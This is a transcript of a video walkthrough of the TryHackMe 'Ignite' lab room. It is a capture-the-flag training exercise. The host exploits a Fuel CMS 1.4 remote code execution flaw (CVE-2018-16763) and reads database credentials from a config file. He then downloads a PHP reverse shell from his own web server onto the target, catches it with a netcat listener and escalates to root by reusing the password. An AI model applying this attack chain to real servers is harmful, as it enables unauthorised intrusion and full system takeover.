Hello again, everyone, and welcome back to Booze and Hacking. I am your host, Dark Hoodie, and we are back with another TryHackMe room. This one is called Ignite, and it says a new startup has a few issues with their web server. The difficulty is rated as easy, but that is a relative term. We'll figure out just how easy it is. And before we begin, let's talk about what we're having today. I am enjoying what is now my favorite beer, Voodoo Ranger. This is their IPA known as Juice Force, and it is a delicious IPA that is not bitter at all, and at a whopping 9.5%, it is certainly a beer that you should enjoy when you're home and not driving. So drink up, everybody. And now back to the room. I have already started the room, and here is our IP address. And in the interest of time, I have also begun my scans. I'm in the VPN for TryHackMe. I've run my Nmap scan. And according to what I see here, the only port that's open is port 80. And it is running what looks like an Apache web server, version 2.4.18. And it looks like the title says, "Welcome to Fuel CMS." And that is all we have here. So again, in the interest of time, I went ahead and ran a GoBuster scan on this, and I see that there are a good number of subfolders here, and so including a robots.txt. And so let's go ahead and take that IP address and pop it into our browser. By the way, I took the liberty of getting myself set up with HackerGPT, and I have to say it's pretty cool. If you have not taken advantage of that, I would encourage you to do so. And so now let's get back to the browser. And what was my IP address? It was 10.10.46.120. So let's go ahead and do 10.10.46.120. And let's type that in, and we have "Welcome to Fuel CMS." And you know what, just to be on the safe side, let's take a look and see what is Fuel CMS. And so it is, according to this, a content management system. It's called Fuel, I guess. The content management system for premium grade, so it looks like it's something that assists you with your websites. So Fuel CMS it is, and it has some instructions here. Change the Apache HTA access file, install the database, make folders writable. So there's some instructions here. And so because we have some subfolders, let's see what's going on with those. So let's start with, I think there was one called, let's see, one called Fuel perhaps. You know what, it doesn't say Fuel here, but what the hell, since it's called Fuel, let's see what happens if we add Fuel to this. Oh, there's a login page. Okay, that is pretty cool. Let's take a look at some source code, see if there's anything interesting here. And there's a lot going on, but I don't see anything. There is a password reset link down here. But nothing else that I think I can use. We'll keep that in mind. So Let's see. Let's go back to our scans. Let's look at robots.txt. Just curious to see if there's anything in there that they didn't give us. And nothing there of use. Okay. Let's go back to fuel for a second. Let's look at this now. I see there's assets, there's home, index. You know what? Let's try assets. Let's see what that does. And we can't get in. Okay. Home and index. And this is that page. Index does the same thing. What does it say here? Let's see. After creating the change the database config found in this to include your host name, username, password, and the database to match the new database you created. Make config changes. Oh, I missed this down here. To access the fuel admin, go to fuel, admin. Okay, there it is. It gave it to us. Admin. It is highly recommended that you change your password. I'll do that later. Let's see. So now we're in this dashboard, and we got in this dashboard. Let's see. Pages, navigation, nothing here. It seems odd. Site variables. Let's see. Users, just admin. Permissions. So a lot of stuff here. Okay. Page cache. Activity log. And settings. Okay. Back to dashboard. Okay, so well, let's see if we can find any kind of vulnerabilities. Now, according to this scan, we'll go back to the Nmap scan. Let's see if it says here 2418. Let's see if this gives us a version. Click here for your site documentation. Alright. Oh, this site is running Fuel CMS 1.4. So, with that in mind, let's go to our old friend exploit-db.com. And let's do a search for Fuel CMS 1.4. And we have some vulnerabilities here. Let's see what's there. Let's see. What is in here? I see remote code execution. I see that actually 3 times. There's a couple of them are PHP. Let's see what this one says. Let's see here. So it's a Python script. And let's see if we can use this. Well, let's find out. Here's our CVE, by the way, 2018-16763. I'm going to go ahead and download this. So here it is. I'm going to rename that though. Let's open it up in here. And let's call it Fuel Exploit. And it's, as we said before, it's remote code, remote code execution. What does it tell us to do? Well, let's open up another terminal and go into my downloads folder and let's find it. I called it Fuel Exploit, right? And it's right there. I got to give it executable permissions. So let's change mod fuelexploit.py. And let's have another look at this. And there it is, it's executable. So now let's do Python 3 fuelexploit.py -u, and let's use our IP address 10.10. Keep forgetting this, 46.120. 46.120. Huh. It says connecting, enter command. Did I just get a reverse shell maybe? Let's look. Huh. So it says system www-data. Let's do this. We are in system/var/www/html. Okay. Let's see what's in here. All right. We have here robots.txt, assets, compose JSON, fuel. Let's do this one and see what's in here now. So now I have to decide, what am I going to look at? Assets is a directory. Fuel is a directory. Let's go into fuel. All right, something called system. Let's what's in here. CD system. It's strange, it's not behaving like it normally should be. Let's see what's in. It's still showing the same thing even though I'm changing directories. System total is 52. Where am I? System var www-html. Let's see what happens if I cat robots.txt. It's the same thing from before, okay. Let's see. Let's try this again. Well, let's see what else is there. Let's see if I can cat the README. Tolerance installation. This looks like more instructions. Let's see if I can cat the index.php. Let's see what's in here. Fuel install directory. Fuel CL. Okay. Let's see if there's any credentials, anything in here that might tell us anything. No trailing slash, no view folder, default this. Let's see if it'll say okay. All right. I wonder if my buddy Hacker GPT can help me out here. Apache web server database page. Let's see. So www-data. All right, let's go back to my shell. Let's cd into fuel again. What happens if I do cat system? Nothing. Okay. System var www-html. Let's see, it keeps saying system. Let's cat system read me, see what that says. All right. Let's try something different. Let's cat fuel. If I remember correctly, application and config and database.php. This is typically where you would find some information on web servers. Let's just roll the dice and see if this works. Ah, okay. I think I got something here. Database connectivity settings. And I see some information here that I can use. Host name localhost, username root, password is meme. Okay. Now I got to figure out where I can use that. I wonder if I can cd into home. ls home. Okay. ls home. How about system www-data? How about home dash slash www dash data? Hey, take a look at that. System flag. Let's see if we can cat that. Cat system cd system cat. Let's try this. Cat home slash www dash data slash system flag dot text. Oh, still nothing, huh? Where am I right now? ls slash home slash www dash data. Okay. So let's try this again. Cat slash home slash www dash data. Let's do that, and then system flag dot txt. Huh. I wonder what will happen if I do this, just to see if this gives me any permissions. This whole thing with system doesn't say anything. All right. Let's pause for a minute. so that I can get an idea of where to go from here. Well, I think I found my mistake. So I'm going to cat again. Home www-data / system flag is not the one. I think the word flag, it runs up against the word system. So I'm just going to do flag.text. And that looks like it could be it. I'm going to try this. First I'm going to do the number, because it looks like the word system is not a part of the flag. So let's go here and paste that in. Yep, that was it. Nothing is ever what meets the eye. So that was the first flag. Now I have to try to get permissions. I need to escalate my permissions. So since sudo-l doesn't give me anything, and we are using PHP, I'm going to use my old friend Pentest Monkey and see if that does anything. So let's open up another terminal. I think Monkey is in my downloads folder, and if I remember correctly, I do have to change a few things. Here it is right here, PHP reverse shell. So let's go nano PHP - reverse shell, which is what I call the monkey script. Now, so okay, if I remember, let me open up another terminal. Let me just verify my IP. I'm sure that's the correct, but 10.13.6.1.12. Okay. 10.13.6.1.12, and that's the port that I like to use. Let's get out of this. So let's do an let's do a Python web server. Python 3 -m http.server 80. Okay. All right, and now, if I remember correctly, I'm going to go back to the target machine and see if I can copy my reverse shell and send it here. Reverse shell http ://10.13.6.112 downloads, and what did I call it? php-reverse-shell.php. php-reverse-shell php-reverse-shell.php. See if this works. Now I'm going to go, looks like it was trying. Maybe I need a netcat listener. cat space dash NL and LVP 4444. Yeah, I forgot to install this. All right, we're listening. Now let's see if on the website if reverse dash shell dash PHP reverse shell PHP dash reverse shell PHP dash reverse dash shell dot PHP. Huh. Something happened. I think I got the shell. All right, now, if I remember correctly, the shell has to be made interactive. Let's do Python -c import pty semi pty dot spawn, and let's do quote /bin /bash end quote. And this, see if my syntax is correct. Okay, www-data. Now I can play around with my shell. Let's do who am I for a second. What would happen if I do su root? Oh, excellent. Where did I see that? Oh, it was me meme. That's right. It was me meme. Okay. We are root. Sweet. Where are we? Okay. Let's see if there's a root folder. And there is. And there is a root.txt, which I am going to cat right now. And there's my other flag. I will go back to TryHackMe. And we are done. And with that, was it easy? I don't know. Nothing's all that easy to me, honestly. Sure, I got everything I needed, but it took a while. But we're done. So I want to thank everyone for attending. If you enjoyed this video, please like and subscribe. And we will all see each other, hopefully, in the next video. Thanks so much for hanging out, everybody. See you all soon.